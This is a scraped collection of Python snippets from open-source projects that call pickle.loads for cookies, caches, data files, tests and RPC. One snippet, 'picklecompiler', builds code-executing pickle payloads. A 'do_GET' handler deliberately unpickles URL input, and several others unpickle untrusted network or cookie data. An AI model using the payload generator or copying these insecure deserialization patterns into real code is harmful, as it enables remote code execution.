我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用cPickle.loads()。
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):
    """ Return the content of a cookie. To read a `Signed Cookie`, the
        `secret` must match the one used to create the cookie (see
        :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
        cookie or wrong signature), return a default value. """
    value = self.cookies.get(key)
    if secret:
        # See BaseResponse.set_cookie for details on signed cookies.
        # Signed format: '!' + base64(hmac) + '?' + base64(pickle((key, value)))
        if value and value.startswith('!') and '?' in value:
            sig, msg = map(tob, value[1:].split('?', 1))
            hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()
            # _lscmp is a length-constant compare to avoid timing attacks.
            if _lscmp(sig, base64.b64encode(hash)):
                # SECURITY: pickle.loads is only safe here because the HMAC
                # signature was verified first; never skip that check.
                dst = pickle.loads(base64.b64decode(msg))
                # The payload stores the cookie name too; make sure it
                # matches so a value signed for one key can't be replayed
                # under another.
                if dst and dst[0] == key:
                    return dst[1]
        # Signed cookie requested but missing/invalid: fall back to default.
        return default
    return value or default
def read_pytable(h5f, group=None):
    # Recursively read a PyTables group into an AttrDict, starting at the
    # file root when no group is given.  String leaves prefixed with 'OBJ_'
    # are stored pickles and are deserialized on the way out.
    if group is None:
        group = h5f.root
    data = AttrDict()
    for child in h5f.list_nodes(group):
        item = None
        try:
            if isinstance(child, tb.group.Group):
                # Sub-group: recurse and store the nested dict.
                item = read_pytable(h5f, child)
            else:
                item = child.read()
                # 'OBJ_' marks a pickled Python object serialized as a
                # string; strip the tag and unpickle.
                # SECURITY NOTE(review): cPickle.loads on file contents
                # executes arbitrary code; only open trusted files.
                if isinstance(item, str) and item.startswith('OBJ_'):
                    item = cPickle.loads(item[4:])
            data[child._v_name] = item
        except tb.NoSuchNodeError:
            # Node disappeared (e.g. dangling link): warn and keep going.
            warnings.warn('No such node: "%s", skipping...' % repr(child))
            pass
    return data
def read(self, group=None):
    # Method form of read_pytable: recursively read a PyTables group from
    # self.h5f into an AttrDict, unpickling 'OBJ_'-tagged string leaves.
    if group is None:
        group = self.h5f.root
    data = AttrDict()
    for child in self.h5f.list_nodes(group):
        item = None
        try:
            if isinstance(child, tb.group.Group):
                # Sub-group: recurse.
                item = self.read(child)
            else:
                item = child.read()
                # 'OBJ_' prefix marks a pickled object stored as a string.
                if isinstance(item, str) and item.startswith('OBJ_'):
                    item = cPickle.loads(item[4:])
            data[child._v_name] = item
        except tb.NoSuchNodeError:
            # Skip dangling nodes rather than aborting the whole read.
            warnings.warn('No such node: "%s", skipping...' %repr(child))
            pass
    return data
def _testStruct(self, Struct, values = {}, delattrs = ()):
    # Pack an instance, round-trip its schema through pickle, and verify
    # the unpickled schema still unpacks the original payload correctly.
    # NOTE: `values={}` mutable default is safe here - it is only read.
    schema = mapped_struct.Schema.from_typed_slots(Struct)
    x = Struct()
    for k in delattrs:
        delattr(x, k)
    for k,v in values.iteritems():
        setattr(x, k, v)
    px = schema.pack(x)
    old_schema = schema
    # Round-trip the schema (protocol 2) and check mutual compatibility.
    schema = cPickle.loads(cPickle.dumps(schema, 2))
    self.assertTrue(old_schema.compatible(schema))
    self.assertTrue(schema.compatible(old_schema))
    dx = schema.unpack(px)
    for k in Struct.__slots__:
        if k in values or k not in delattrs:
            # Set (or default-initialized) attributes must survive the trip.
            self.assertEquals(getattr(dx, k, None), getattr(x, k, None))
        else:
            # Deleted attributes must stay absent after unpacking.
            self.assertFalse(hasattr(dx, k))
def testPackPickleUnpack(self):
    # Verify that unpickling a schema auto-registers its subschema:
    # the subschema registration is deliberately removed before
    # cPickle.loads so the unpickling path has to re-register it.
    # hack - unregister subschema (can't register twice)
    mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None)
    mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None)
    for TEST_VALUES in self.TEST_VALUES:
        # re-register subschema
        mapped_struct.mapped_object.register_schema(self.SubStruct, self.subschema, '}')
        x = self.Struct(**{k:v for k,v in TEST_VALUES.iteritems()})
        pschema = cPickle.dumps(self.schema)
        # Unregister schema to force the need for auto-register
        mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None)
        mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None)
        pschema = cPickle.loads(pschema)
        dx = pschema.unpack(self.schema.pack(x))
        for k,v in TEST_VALUES.iteritems():
            self.assertTrue(hasattr(dx, k))
            self.assertEqual(getattr(dx, k), v)
        for k in self.Struct.__slots__:
            if k not in TEST_VALUES:
                # Unset slots must not materialize after unpacking.
                self.assertFalse(hasattr(dx, k))
def load_object(self, value):
    """The reversal of :meth:`dump_object`.  This might be called with
    None.

    Accepts ``None`` (returned as-is), a ``b'!'``-prefixed pickle blob,
    an ASCII integer, or (pre-0.8 storage format) a raw byte string.
    """
    if value is None:
        return None
    if value.startswith(b'!'):
        payload = value[1:]
        try:
            return pickle.loads(payload)
        except pickle.PickleError:
            # Corrupt pickle data degrades to a cache miss.
            return None
    try:
        return int(value)
    except ValueError:
        # Before 0.8 there was no serialization; pass raw values through.
        return value
def recv(self):
    'Receive one object.'
    # Messages are NUL-delimited on the wire; accumulate socket reads in
    # self.__temp until a full frame ('\0'-terminated) is available.
    # The lock serializes concurrent receivers over the shared buffer.
    self.__recv.acquire()
    try:
        while '\0' not in self.__temp:
            temp = self.__sock.recv(2 ** 12)
            if not temp:
                # Peer closed the connection.
                if self.__temp:
                    # Mid-frame close: the partial message is lost.
                    raise IOError
                else:
                    # Clean close on a frame boundary.
                    raise EOFError
            self.__temp += temp
        # Split off the first complete frame, keep the rest buffered.
        temp, self.__temp = self.__temp.split('\0', 1)
    finally:
        self.__recv.release()
    # _base255 presumably un-escapes NUL-free wire encoding - TODO confirm.
    # SECURITY NOTE(review): unpickling socket data executes arbitrary
    # code; only use on trusted peers.
    return _cPickle.loads(_base255.decode(temp))

################################################################################
def cache(key_prefix, timeout=300):
    """
    Decorator for caching functions.

    Returns the cached value from Redis when available; otherwise calls
    the wrapped function, stores its result for ``timeout`` seconds, and
    returns it.  When the PYBOSSA_REDIS_CACHE_DISABLED environment
    variable is set the cache is never read, but the result is still
    written so the cache stays warm.
    """
    if timeout is None:
        timeout = 300
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            key = "%s::%s" % (settings.REDIS_KEYPREFIX, key_prefix)
            if os.environ.get('PYBOSSA_REDIS_CACHE_DISABLED') is None:
                # Reads go to a slave; a hit short-circuits the call.
                output = sentinel.slave.get(key)
                if output:
                    return pickle.loads(output)
            # Miss (or cache disabled): compute once and store via the
            # master.  The original duplicated this block in both paths.
            output = f(*args, **kwargs)
            sentinel.master.setex(key, timeout, pickle.dumps(output))
            return output
        return wrapper
    return decorator
def testOldPickles(self):
    # Ensure that applications serializing pytz instances as pickles
    # have no troubles upgrading to a new pytz release. These pickles
    # were created with pytz2006j.
    east1 = pickle.loads(_byte_string(
        "cpytz\n_p\np1\n(S'US/Eastern'\np2\nI-18000\n"
        "I0\nS'EST'\np3\ntRp4\n."
    ))
    east2 = pytz.timezone('US/Eastern')
    # pytz guarantees singleton tzinfo objects, hence identity checks.
    self.assertTrue(east1 is east2)
    # Confirm changes in name munging between 2006j and 2007c cause
    # no problems.
    pap1 = pickle.loads(_byte_string(
        "cpytz\n_p\np1\n(S'America/Port_minus_au_minus_Prince'"
        "\np2\nI-17340\nI0\nS'PPMT'\np3\ntRp4\n."))
    pap2 = pytz.timezone('America/Port-au-Prince')
    self.assertTrue(pap1 is pap2)
    gmt1 = pickle.loads(_byte_string(
        "cpytz\n_p\np1\n(S'Etc/GMT_plus_10'\np2\ntRp3\n."))
    gmt2 = pytz.timezone('Etc/GMT+10')
    self.assertTrue(gmt1 is gmt2)
def load_weights(fname, params):
    # Load parameter values from an .npz/.npy archive into the given
    # shared variables, matching entries by parameter name.  Callers
    # typically collect `params` via lasagne.layers.get_all_params(...).
    names = [ par.name for par in params ]
    if len(names)!=len(set(names)):
        # Name is the lookup key, so duplicates would be ambiguous.
        raise ValueError('need unique param names')
    param_dict = np.load(fname)
    for param in params:
        if param.name in param_dict:
            stored_shape = np.asarray(param_dict[param.name].shape)
            param_shape = np.asarray(param.get_value().shape)
            if not np.all(stored_shape == param_shape):
                # Shape mismatch: warn and leave the parameter untouched.
                warn_msg = 'shape mismatch:'
                warn_msg += '{} stored:{} new:{}'.format(param.name, stored_shape, param_shape)
                warn_msg += ', skipping'
                warnings.warn(warn_msg)
            else:
                param.set_value(param_dict[param.name])
        else:
            logging.warn('unable to load parameter {} from {}'.format(param.name, fname))
    # Optional pickled metadata blob stored alongside the weights.
    if 'metadata' in param_dict:
        metadata = pickle.loads(str(param_dict['metadata']))
    else:
        metadata = {}
    return metadata
def testNonIdentityHash(self):
    # Versioned upgrades must work even when instances share a __hash__
    # value, so the upgrade machinery can't rely on hashing for identity.
    global ClassWithCustomHash
    class ClassWithCustomHash(styles.Versioned):
        def __init__(self, unique, hash):
            self.unique = unique
            self.hash = hash
        def __hash__(self):
            return self.hash
    # Two distinct objects with the same (colliding) hash.
    v1 = ClassWithCustomHash('v1', 0)
    v2 = ClassWithCustomHash('v2', 0)
    pkl = pickle.dumps((v1, v2))
    del v1, v2
    # Bump the class version after pickling so loading requires upgrade.
    ClassWithCustomHash.persistenceVersion = 1
    ClassWithCustomHash.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True)
    v1, v2 = pickle.loads(pkl)
    styles.doUpgrade()
    # Both instances must keep their own state and both must be upgraded.
    self.assertEquals(v1.unique, 'v1')
    self.assertEquals(v2.unique, 'v2')
    self.failUnless(v1.upgraded)
    self.failUnless(v2.upgraded)
def testUpgradeDeserializesObjectsRequiringUpgrade(self):
    # An upgrade hook that itself unpickles another object needing an
    # upgrade (and re-enters doUpgrade) must leave both objects upgraded.
    global ToyClassA, ToyClassB
    class ToyClassA(styles.Versioned):
        pass
    class ToyClassB(styles.Versioned):
        pass
    x = ToyClassA()
    y = ToyClassB()
    pklA, pklB = pickle.dumps(x), pickle.dumps(y)
    del x, y
    ToyClassA.persistenceVersion = 1
    def upgradeToVersion1(self):
        # Deserialize a B inside A's upgrade, then run the upgrade pass
        # again so the freshly loaded B gets upgraded too.
        self.y = pickle.loads(pklB)
        styles.doUpgrade()
    ToyClassA.upgradeToVersion1 = upgradeToVersion1
    ToyClassB.persistenceVersion = 1
    ToyClassB.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True)
    x = pickle.loads(pklA)
    styles.doUpgrade()
    self.failUnless(x.y.upgraded)
def ListTableColumns(self, table):
    """Return a list of columns in the given table.
    [] if the table doesn't exist.
    """
    # Python 2 code (statement-form raise below).
    assert isinstance(table, str)
    if contains_metastrings(table):
        raise ValueError, "bad table name: contains reserved metastrings"

    # The column list for a table is stored pickled under a derived key.
    columnlist_key = _columns_key(table)
    # getattr indirection: works with db objects exposing has_key/get_bytes
    # or only the plain get interface.
    if not getattr(self.db, "has_key")(columnlist_key):
        return []
    pickledcolumnlist = getattr(self.db, "get_bytes", self.db.get)(columnlist_key)
    if pickledcolumnlist:
        return pickle.loads(pickledcolumnlist)
    else:
        return []
def picklecompiler(sourcefile): """ Usually pickle can only be used to (de)serialize objects. This tiny snippet will allow you to transform arbitrary python source code into a pickle string. Unpickling this string with pickle.loads() will execute the given soruce code. The trick is actually prettey easy: Usually eval() will only accept expressions, thus class and function declarations does not work. Using the work-around of code objects (returned by compile()), we can execute real python source code :) """ sourcecode = file(sourcefile).read() payload = "c__builtin__\neval\n(c__builtin__\ncompile\n(%sS'<payload>'\nS'exec'\ntRtR." % (pickle.dumps( sourcecode )[:-4],) print payload fp =open("poc.pickle","w") fp.write(payload)
def do_GET(self):
    # SECURITY: deliberately vulnerable demo handler - it unpickles an
    # attacker-controlled query parameter, which allows remote code
    # execution.  Never deploy code like this.
    # (Python 2 code: print statements, `except Exception, e` syntax.)
    if "?payload" in self.path:
        # Split URL into (path, query) and take the value after '='.
        query= urllib.splitquery(self.path)
        action = query[1].split('=')[1]
        print action
        action = urllib.unquote(action)
        print action
        try:
            x = cPickle.loads(action)    #string argv
            content = "command executed"
        except Exception,e:
            print e
            content = e
    else:
        content = "hello World"
    self.send_response(200)
    self.send_header("Content-type","text/html")
    self.end_headers()
    self.wfile.write("<html>")
    self.wfile.write(" %s " % content)
    self.wfile.write("</html>")
def members(self, name, count=1, with_all=False):
    """set srandmember command

    Fetch members of the redis set ``name``: all of them when
    ``with_all`` is true, otherwise up to ``count`` random members.
    Values are deserialized with ``self.loads``.

    :return set members (always as a list), or None when the set is empty
    """
    count = abs(count)
    name = str(name)
    result = None
    try:
        if with_all:
            result = self.__smembers(name)  # return set
        else:
            result = self.__srandmember(name, count)  # return list
    except:
        # Compatible for low version redis: older servers don't accept a
        # count argument to SRANDMEMBER, so retry for a single value.
        result = self.__srandmember(name)  # return one value
    if result is None:
        return None
    if isinstance(result, list) or isinstance(result, set):
        return [self.loads(i) for i in result]
    # Single-value fallback path: normalize to a one-element list.
    return [self.loads(result)]
def load(F):
    """
    Wrapper around ``cPickle.load`` which accepts either a file-like object
    or a filename.

    Parameters
    ----------
    F : str or file
        The file or file name to load.

    See Also
    --------
    dump : Pickle an array

    Notes
    -----
    This is different from `numpy.load`, which does not use cPickle but
    loads the NumPy binary .npy format.
    """
    if hasattr(F, 'readline'):
        # Already an open file-like object; the caller owns its lifetime.
        return pickle.load(F)
    # Filename given: open in *binary* mode (pickle data is bytes; text
    # mode corrupts it on Windows/Python 3) and close the handle even if
    # unpickling raises.  The original opened with 'r' and never closed.
    with open(F, 'rb') as fh:
        return pickle.load(fh)
def loads(strg):
    """
    Load a pickle from the current string.

    The result of ``cPickle.loads(strg)`` is returned; this is a thin
    convenience wrapper around the pickle module.

    Parameters
    ----------
    strg : str
        The string to load.

    See Also
    --------
    dumps : Return a string corresponding to the pickling of a masked array.

    """
    return pickle.loads(strg)
def on_evaluation_request(self, ch, method, props, body): """Callback for messages in the 'rpc_evaluations_queue' They say: "Hey, here are the execution results" """ # This is the "remote procedure" # being called and returning a value ev_mutation_object = pickle.loads(body) self.process_execution_results(ev_mutation_object) ch.basic_publish(exchange = '', routing_key = props.reply_to, properties = pika.BasicProperties( correlation_id = props.correlation_id), body = 'EVALUATION RECEIVED') ch.basic_ack(delivery_tag = method.delivery_tag)
def read_logs(self):
    # Receive pickled LogRecord dicts over a datagram socket (the wire
    # format of logging.handlers.DatagramHandler: 4-byte length prefix
    # followed by the pickled record dict) and re-emit them locally.
    # (Python 2 code: print statement below.)
    try:
        while True:
            datagram = self.socket.recv(8192)
            chunk = datagram[0:4]
            # Length prefix is unpacked but deliberately unused: a
            # datagram always carries exactly one whole record.
            struct.unpack(">L", chunk)[0]
            chunk = datagram[4:]
            obj = cPickle.loads(chunk)
            record = logging.makeLogRecord(obj)
            # Filter by this reader's level, then hand the record to the
            # logger named in the record itself.
            if (record.levelno >= self.level):
                logger = logging.getLogger(record.name)
                logger.handle(record)
    except Exception as e:
        print "ERROR: " + str(e)
    finally:
        self.socket.close()
def test_text_dataset():
    # A pickled epoch iterator must resume from the position it was
    # pickled at: the clone replays the stream from where the original
    # stood at dump time, independent of the original's later advance.
    with temporary_content_path(TEST_TEXT) as path:
        dataset = TextDataset(path, 100)
        stream = dataset.get_example_stream()
        it = stream.get_epoch_iterator()
        d = next(it)
        assert d == (['abc', 'abc', 'def'],)
        # Snapshot the iterator state after one example.
        pickled_it = cPickle.dumps(it)
        d = next(it)
        assert d == (['def', 'def', 'xyz'],)
        # Restore: the clone re-yields the example consumed after the dump.
        it = cPickle.loads(pickled_it)
        d = next(it)
        assert d == (['def', 'def', 'xyz'],)
        d = next(it)
        assert d == (['xyz'],)
def load_object(self, value):
    """The reversal of :meth:`dump_object`.  This might be called with
    None.
    """
    if value is None:
        return None
    if not value.startswith(b'!'):
        # Legacy path (pre-0.8, no serialization): integers were stored
        # as ASCII digits, everything else as raw bytes.
        try:
            return int(value)
        except ValueError:
            return value
    # '!'-prefixed values are pickle payloads; corrupt data reads as a miss.
    try:
        return pickle.loads(value[1:])
    except pickle.PickleError:
        return None
def get(self, key, timeout=None):
    """Given a key, returns an element from the redis table

    The stored entry is a pickled tuple whose element [1] is the cached
    value; the other element(s) feed the expiry check - exact layout is
    defined by the writer side (TODO confirm against set()).
    """
    # All keys are namespaced with the instance prefix.
    key = self.pre_identifier + key
    # Check to see if we have this key
    # (name is misleading: this is the *pickled* bytes from redis).
    unpickled_entry = self.client.get(key)
    if not unpickled_entry:
        # No hit, return nothing
        return None
    entry = pickle.loads(unpickled_entry)
    # Use provided timeout in arguments if provided
    # otherwise use the one provided during init.
    if timeout is None:
        timeout = self.timeout
    # Make sure entry is not expired
    if self._is_expired(entry, timeout):
        # entry expired, delete and return nothing
        self.delete_entry(key)
        return None
    # entry found and not expired, return it
    return entry[1]
def tpn_test_iterator(track_path):
    """Load every pickled track stored at `track_path`.

    `track_path` is either a zip archive or a directory; each member /
    file holds one cPickle-serialized track.

    Returns
    -------
    tracks : list
        The deserialized tracks (the original docstring wrongly named
        this ``x``).

    Raises
    ------
    NotImplementedError
        If `track_path` is neither a zipfile nor a directory.
    """
    tracks = []
    # zipfile
    if zipfile.is_zipfile(track_path):
        zf = zipfile.ZipFile(track_path)
        try:
            for track_name in zf.namelist():
                tracks.append(cPickle.loads(zf.read(track_name)))
        finally:
            # Close even if a member fails to unpickle.
            zf.close()
    # folders
    elif osp.isdir(track_path):
        for track_name in sorted(glob.glob(osp.join(track_path, '*'))):
            # `with` fixes the original's leak of one descriptor per track.
            with open(track_name, 'rb') as f:
                tracks.append(cPickle.loads(f.read()))
    else:
        raise NotImplementedError('Only zipfile and directories are supported.')
    return tracks
def _loadJson(cls, filename):
    # Reconstruct a database object from a JSON file whose values are
    # base64-encoded pickled tables.  (Python 2 code: dict.iteritems.)
    jsonFh = open(filename, "r")
    jsonDb = json.load(jsonFh)
    jsonFh.close()
    db = cls()
    backRefTables = []
    for tableName, b64PickledTable in jsonDb.iteritems():
        pickledTable = base64.b64decode(b64PickledTable)
        table = pickle.loads(pickledTable)
        if tableName == "_backRefTables":
            # Special entry: list of table names needing a back-reference
            # to the database; handled after all tables are attached.
            backRefTables = table
            continue
        setattr(db, tableName, table)
    # Re-wire back-references that pickling could not preserve.
    for tableName in backRefTables:
        getattr(db, tableName).setDatabase(db)
    # Give subclasses a hook to post-process each loaded table.
    for tableName, table in db.__dict__.iteritems():
        table = cls._loadJsonTableTransform(db, tableName, table)
        setattr(db, tableName, table)
    return db
def __GetResourceValuesFromReadResponse(self, response, path, resourceType):
    """Extract and unpickle the array values at `path` from a server
    read response, dispatching on the array resource type.

    Raises AwaInvalidArgumentException for non-array resource types.
    """
    session = self._xmlrpcSession
    # One XML-RPC accessor per supported array type.
    getters = {
        AwaResourceType.StringArray: session.AwaServerReadResponse_GetValuesAsStringArrayPointer,
        AwaResourceType.IntegerArray: session.AwaServerReadResponse_GetValuesAsIntegerArrayPointer,
        AwaResourceType.FloatArray: session.AwaServerReadResponse_GetValuesAsFloatArrayPointer,
        AwaResourceType.BooleanArray: session.AwaServerReadResponse_GetValuesAsBooleanArrayPointer,
        AwaResourceType.OpaqueArray: session.AwaServerReadResponse_GetValuesAsOpaqueArrayPointer,
        AwaResourceType.TimeArray: session.AwaServerReadResponse_GetValuesAsTimeArrayPointer,
        AwaResourceType.ObjectLinkArray: session.AwaServerReadResponse_GetValuesAsObjectLinkArrayPointer,
    }
    if resourceType not in getters:
        raise AwaInvalidArgumentException("Invalid resource type", resourceType)
    values = pickle.loads(getters[resourceType](response, path, None))
    return values
def __GetResourceValuesFromGetResponse(self, response, path, resourceType):
    """Extract and unpickle the array values at `path` from a client
    get response, dispatching on the array resource type.

    Raises AwaInvalidArgumentException for non-array resource types.
    """
    session = self._xmlrpcSession
    # One XML-RPC accessor per supported array type.
    getters = {
        AwaResourceType.StringArray: session.AwaClientGetResponse_GetValuesAsStringArrayPointer,
        AwaResourceType.IntegerArray: session.AwaClientGetResponse_GetValuesAsIntegerArrayPointer,
        AwaResourceType.FloatArray: session.AwaClientGetResponse_GetValuesAsFloatArrayPointer,
        AwaResourceType.BooleanArray: session.AwaClientGetResponse_GetValuesAsBooleanArrayPointer,
        AwaResourceType.OpaqueArray: session.AwaClientGetResponse_GetValuesAsOpaqueArrayPointer,
        AwaResourceType.TimeArray: session.AwaClientGetResponse_GetValuesAsTimeArrayPointer,
        AwaResourceType.ObjectLinkArray: session.AwaClientGetResponse_GetValuesAsObjectLinkArrayPointer,
    }
    if resourceType not in getters:
        raise AwaInvalidArgumentException("Invalid resource type", resourceType)
    values = pickle.loads(getters[resourceType](response, path, None))
    return values
def retry_until_success(self, msg, times):
    # Send `msg` on the internal channel until a non-error reply arrives,
    # backing off 0.5s between attempts.  NOK/DIE replies mean "retry".
    stop = False
    while not stop:
        self.internal_channel.send_first_internal_channel_message(msg)
        rep_msg = self.internal_channel.wait_int_message(dont_wait=False)
        if not (rep_msg == NOK or rep_msg == DIE):
            rep_msg = loads(rep_msg)
            # `times == 2` gates the birth-info update; original author
            # already flagged it as "not necessary" - candidate for removal.
            if times == 2:  # not necessary
                self.update_birth_information(rep_msg)
            stop = True
        else:
            self.logger.debug("wrong information at sync time, retry in 0.5 seconds")
            time.sleep(0.5)
def deserialize(pkl):
    """Reconstruct a Python object from its pickle byte string `pkl`."""
    obj = pickle.loads(pkl)
    return obj
def cookie_decode(data, key, digestmod=None):
    """ Verify and decode an encoded string. Return an object or None."""
    # Deprecated public API; kept for backward compatibility.
    depr(0, 13, "cookie_decode() will be removed soon.",
         "Do not use this API directly.")
    data = tob(data)
    if cookie_is_encoded(data):
        # Wire format: '!' + base64(hmac) + '?' + base64(pickle(obj)).
        sig, msg = data.split(tob('?'), 1)
        digestmod = digestmod or hashlib.sha256
        hashed = hmac.new(tob(key), msg, digestmod=digestmod).digest()
        # _lscmp: length-constant comparison; sig[1:] strips the '!' marker.
        if _lscmp(sig[1:], base64.b64encode(hashed)):
            # Unpickling is gated on a valid HMAC, so only holders of
            # `key` can craft payloads.
            return pickle.loads(base64.b64decode(msg))
    return None
def value_decode(self, val):
    """Decode a cookie value: unquote, then unpickle.

    NOTE: propagates any exception raised by a malformed pickle.
    """
    unquoted = _unquote(val)
    return loads(unquoted), val
def value_decode(self, val):
    """Best-effort cookie value decode: unquote, then unpickle, falling
    back to the unquoted string when the payload is not a valid pickle.
    """
    raw = _unquote(val)
    try:
        decoded = loads(raw)
    except:
        # Bare except kept from the original: *any* failure falls back
        # to returning the raw string.
        return raw, val
    return decoded, val
def reshape(self, bottom, top):
    # Caffe python-layer hook: block until the spider pushes a batch onto
    # the redis list, pop and unpickle it, then shape the top blobs to
    # match.  (Python 2 code: print statement; busy-wait poll at 5 Hz.)
    while self.redis.llen(config.solver_prototxt) == 0:
        print 'waiting for spider...', self.redis.llen(config.solver_prototxt)
        time.sleep(0.2)
    self.item = cPickle.loads(self.redis.lpop(config.solver_prototxt))
    item = self.item
    # One popped blob per top; top[i] takes the shape of item[i].
    for i in range(len(item)):
        top[i].reshape(*item[i].shape)
def unpack(self, item):
    """Decode one value read back from pytables: ndarrays pass through,
    'OBJ_'-tagged strings are unpickled, anything else is an error."""
    if isinstance(item, np.ndarray):
        return item
    if isinstance(item, str) and item.startswith('OBJ_'):
        # Strip the 4-char tag and restore the pickled object.
        return cPickle.loads(item[4:])
    raise ValueError('Unknown type written to pytables')
def unpicklechops(string):
    """base64-decodes and unpickles its argument string into chops."""
    # Pipeline: base64 text -> zlib decompress -> pickle -> chops object.
    # (Python 2 era: base64.decodestring was removed in Python 3.9.)
    # SECURITY NOTE(review): `loads` on externally supplied data executes
    # arbitrary code; only call on trusted input.
    return loads(zlib.decompress(base64.decodestring(string)))
def testPackPickleUnpack(self):
    # Round-trip the schema through pickle and verify the unpickled copy
    # unpacks payloads produced by the original schema.
    for TEST_VALUES in self.TEST_VALUES:
        x = self.Struct(**{k:v for k,v in TEST_VALUES.iteritems()})
        pschema = cPickle.loads(cPickle.dumps(self.schema))
        dx = pschema.unpack(self.schema.pack(x))
        for k,v in TEST_VALUES.iteritems():
            self.assertTrue(hasattr(dx, k))
            self.assertEqual(getattr(dx, k), v)
        for k in self.Struct.__slots__:
            if k not in TEST_VALUES:
                # Unset slots must not appear on the unpacked instance.
                self.assertFalse(hasattr(dx, k))
def __init__(self, buf, offset = 0, idmap = None, idmap_size = 1024):
    # Map a packed-struct buffer for reading.  Layout (from the code
    # below): a fixed _Header (total size, index offset, element count),
    # optionally a _NewHeader (version info + pickled-schema location),
    # then data, with a uint64 index at index_offset.
    if idmap is None:
        idmap = Cache(idmap_size)
    self.offset = offset
    if offset != 0:
        # Re-base so all header/index offsets are relative to `offset`.
        self.buf = buf = buffer(buf, offset)
    else:
        self.buf = buf
    self.total_size, self.index_offset, self.index_elements = self._Header.unpack_from(buf, 0)
    self.index = numpy.frombuffer(buf,
        offset = self.index_offset,
        dtype = numpy.uint64,
        count = self.index_elements)
    self.idmap = idmap

    if self.index_elements > 0 and self.index[0] >= (self._Header.size + self._NewHeader.size):
        # New version, most likely: first element starts beyond both
        # headers, so a _NewHeader should be present.
        self.version, min_reader_version, self.schema_offset, self.schema_size = self._NewHeader.unpack_from(
            buf, self._Header.size)
        if self._CURRENT_VERSION < min_reader_version:
            raise ValueError((
                "Incompatible buffer, this buffer needs a reader with support for version %d at least, "
                "this reader supports up to version %d") % (
                    min_reader_version,
                    self._CURRENT_VERSION
                ))
        if self.schema_offset and self.schema_size:
            # Bounds-check before unpickling the embedded schema.
            if self.schema_offset > len(buf) or (self.schema_size + self.schema_offset) > len(buf):
                raise ValueError("Corrupted input - bad schema location")
            stored_schema = cPickle.loads(bytes(buffer(buf, self.schema_offset, self.schema_size)))
            if not isinstance(stored_schema, Schema):
                raise ValueError("Corrupted input - unrecognizable schema")
            # Prefer the stored schema unless a compatible one was
            # already configured on self.
            if self.schema is None or not self.schema.compatible(stored_schema):
                self.schema = stored_schema
        elif self.schema is None:
            raise ValueError("Cannot map schema-less buffer without specifying schema")
    elif self.index_elements > 0:
        # Old (version-0) layout carries no schema info: refuse to guess.
        raise ValueError("Cannot reliably map version-0 buffers")
def _handle_serialization(func): def wrapped(session, params): params = pickle.loads(params['params']) rv = func(session, *params['args'], **params['kwargs']) return pickle.dumps(rv) return wrapped
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
    """Invoke plugin function `fn` with pickled args/kwargs and unpickle
    its reply (counterpart of the _handle_serialization wrapper)."""
    payload = pickle.dumps(dict(args=args, kwargs=kwargs))
    raw = self.call_plugin(plugin, fn, {'params': payload})
    return pickle.loads(raw)
def get(self, key):
    """Return the cached value for `key`, or None when the key is
    missing, the entry has expired, or the payload cannot be unpickled.
    An `expires` of 0 means the entry never expires."""
    try:
        expires, payload = self._cache[key]
    except KeyError:
        return None
    if expires != 0 and expires <= time():
        # Past its deadline: treat as a miss (entry is left in place,
        # matching the original behavior).
        return None
    try:
        return pickle.loads(payload)
    except pickle.PickleError:
        return None